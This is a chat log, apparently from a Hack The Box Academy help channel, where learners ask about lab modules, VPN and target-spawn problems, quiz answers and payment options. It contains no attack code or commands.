cloud urchin
#

The only time I've seen connection issues not on user end is when there's a problem with the region or something. It's likely on your end, especially if you're launching the VPN and Pwnbox at the same time as they use the same IP. Try changing regions. Never had any issues in the exam environment.

white vale
cloud urchin
#

The pwnbox uses the same VPN IP

#

So you're going to have routing conflicts

white vale
#

hum ok I'll try that from now on

#

thanks!

scenic parcel
#

Hi all! I've answered the question in Bypassing Other Blacklisted Characters section of Command Injections module. But I have a question. Anyone I can DM?

subtle lake
#

Hey everyone
I’m a bit stuck on the Network Foundations module, specifically in Content 3: “Components of Network”.
I need to answer this question:

“What type of cable is used to connect components within a local area network for high-speed data transfer?”

I’ve already tried “Ethernet cable” and several variations, but it keeps getting marked as incorrect
Could anyone tell me what answer worked for you?

Thanks in advance

leaden star
#

Hey everyone, anyone recently complete the Common Session Variables (Account T`akeover) lab? I was able to reset the admin users password but stuck on || bypassing mfa on login_2.php|| any nudge would be appreciated!

subtle lake
#

That was the answer; I spent 10 minutes looking for a synonym, and the mistake was the word ‘cable’ 💀

jovial walrus
#

I need a lil help understanding linked server - attacking sql db on attacking common services

vivid breach
#

T

jovial walrus
waxen totem
jovial walrus
waxen totem
#

btw by connected to I meant linked to

jovial walrus
jovial walrus
#

ahh

#

even claude was getting this wrong

#

the sql commands r already so monotonous and then there is this stuff

waxen totem
jovial walrus
#

it is a mess

#

or maybe its just me

waxen totem
#

you'll be able to tell the difference soon enough

civic fiber
#

I think hack the box going to release certified mobile application pentest?

hasty mauve
#

Only job role paths are translated into certs.

civic fiber
dusty viper
graceful ferry
#

Am i being dumb or what?
For Advanced XSS and CSRF Exploitation - Skills assessment i get the IP of the web application, but i don't get the VHOSTs for it. When i go to http://IP i get default apache webpage

dusty viper
fast vault
#

HTB having issues right now? trying to do the pivoting skills assessment but the target system wont spawn. also my vpn ip keeps changing

dusty viper
upper haven
junior thicket
#

I want to buy Academy sub, but I don't have a credit card or a PayPal account. Is there any way I can buy using a debit card?

winter shell
#

i am having an issue with the Active Directory Enumeration & Attacks/LLMNR/NBT-NS Poisoning - from Linux/ . i cant spawn the machine. are there any bug ?

waxen totem
junior thicket
#

okay let me try once

#

in checkout page it only shows credit card and paypal option

scenic parcel
junior thicket
#

Okay thanks

waxen totem
#

add 1 to the salt, they were expecting you to use echo + wc which adds a newline to the length

leaden star
#

Hey everyone, anyone recently complete the Common Session Variables (Account T`akeover) lab? I was able to reset the admin users password but stuck on || bypassing mfa on login_2.php|| any nudge would be appreciated!

fathom pendant
#

@narrow slate that module is tier 1; so sharing the code is against the rules

narrow slate
fathom pendant
narrow slate
#

alright , i did , i supposed to ask for permission for help with that modulo , my apologies

fathom pendant
narrow slate
#

alright , understood

narrow slate
#

i keep getting bad decrypt error in
module Junior Cybersecurity Analyst. section Introduction to Bash Scripting, Flow Control - Loops
Exercise Script, any help , thanks

fathom pendant
acoustic oak
#

Hi there not the biggest deal but for the Web Fuzzing module there is an interactive course listed as an article.

Expected behavior for an article would be to not have to spawn a target to answer the questions.

deep hemlock
#

help me with this one

#

its not loading at all

acoustic oak
#

Did you try terminating and restarting the target?

deep hemlock
#

a lot of time

acoustic oak
#

Is that a yes?

deep hemlock
deep hemlock
acoustic oak
#

Ah okay. Any reason you're using port 8000?

deep hemlock
#

Attacking Common Applications
Page 14
Attacking Splunk

#

Check this page you will get to know

acoustic oak
#

Thank you.

#

Did you try to connect on your own machine by downloading the VPN file? Maybe an issue with pwn box?

deep hemlock
#

tried

acoustic oak
#

=/

deep hemlock
#

now loaded it took about 15 minute lol